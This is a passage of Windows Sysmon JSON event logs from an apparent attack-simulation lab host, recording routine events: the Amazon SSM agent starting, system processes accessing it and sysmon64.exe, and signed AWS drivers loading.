{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1441,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.315\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001079BF0200}\r\nProcessId: 2224\r\nImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=C982D5932238041410A29A1992B365B0,SHA256=585DB96A52F0C60A6DBC0BFCE79C533D6012C8973F8FC0FAEB659F9A5303DCCF,IMPHASH=F0070935B15A909B9DC00BE7997E6112\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.315","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001079BF0200}","Image":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=C982D5932238041410A29A1992B365B0,SHA256=585DB96A52F0C60A6DBC0BFCE79C533D6012C8973F8FC0FAEB659F9A5303DCCF,IMPHASH=F0070935B15A909B9DC00BE7997E6112","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1442,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.677\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 940\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001079BF0200}\r\nTargetProcessId: 2224\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.677","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"940","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001079BF0200}","TargetProcessId":"2224","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1443,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.677\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001079BF0200}\r\nTargetProcessId: 2224\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.677","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001079BF0200}","TargetProcessId":"2224","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":6,"OpcodeValue":0,"RecordNumber":1444,"ProcessID":2928,"ThreadID":3412,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Driver loaded:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:54.131\r\nImageLoaded: C:\\Windows\\System32\\drivers\\xenvif.sys\r\nHashes: MD5=159E9512AA64057D43A1BEDF4D3122E0,SHA256=1932630E63EBE989E884C4EE8FA6C0A9FC1C1638397D721995C23EF292BB5B23,IMPHASH=C119D28B8420C26CE25D996F6D25FD88\r\nSigned: true\r\nSignature: Amazon Web Services, Inc.\r\nSignatureStatus: Valid","Category":"Driver loaded (rule: DriverLoad)","Opcode":"Info","UtcTime":"2020-08-01 06:48:54.131","ImageLoaded":"C:\\Windows\\System32\\drivers\\xenvif.sys","Hashes":"MD5=159E9512AA64057D43A1BEDF4D3122E0,SHA256=1932630E63EBE989E884C4EE8FA6C0A9FC1C1638397D721995C23EF292BB5B23,IMPHASH=C119D28B8420C26CE25D996F6D25FD88","Signed":"true","Signature":"Amazon Web Services, Inc.","SignatureStatus":"Valid","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":6,"OpcodeValue":0,"RecordNumber":1445,"ProcessID":2928,"ThreadID":3412,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Driver loaded:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:54.131\r\nImageLoaded: C:\\Windows\\System32\\drivers\\xeniface.sys\r\nHashes: MD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9A\r\nSigned: true\r\nSignature: Amazon Web Services, Inc.\r\nSignatureStatus: Valid","Category":"Driver loaded (rule: DriverLoad)","Opcode":"Info","UtcTime":"2020-08-01 06:48:54.131","ImageLoaded":"C:\\Windows\\System32\\drivers\\xeniface.sys","Hashes":"MD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9A","Signed":"true","Signature":"Amazon Web Services, Inc.","SignatureStatus":"Valid","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1446,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.754\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.754","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1447,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.754\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.754","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1448,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.754\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.754","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1449,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.754\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.754","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1450,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.754\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.754","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020